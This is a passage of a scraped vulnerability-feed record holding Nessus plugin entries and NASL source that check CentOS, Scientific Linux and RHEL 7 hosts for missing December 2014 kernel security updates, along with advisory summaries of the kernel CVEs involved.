value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.13.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:48:35", "description": "* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti- touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)", "edition": 17, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2014-12-15T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20141209)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-15T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20141209_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/80014", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80014);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20141209)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti- touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1412&L=scientific-linux-errata&T=0&P=1701\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d96b923\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.13.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:15:12", "description": "Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2014-12-10T00:00:00", "title": "RHEL 7 : kernel (RHSA-2014:1971)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2014-1971.NASL", "href": "https://www.tenable.com/plugins/nessus/79848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1971. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79848);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\");\n script_bugtraq_id(64111, 68048, 68159, 68162, 68163, 68862, 69763, 69768, 69770, 69779, 69781, 69799, 70095, 70766, 70768, 70883);\n script_xref(name:\"RHSA\", value:\"2014:1971\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2014:1971)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was 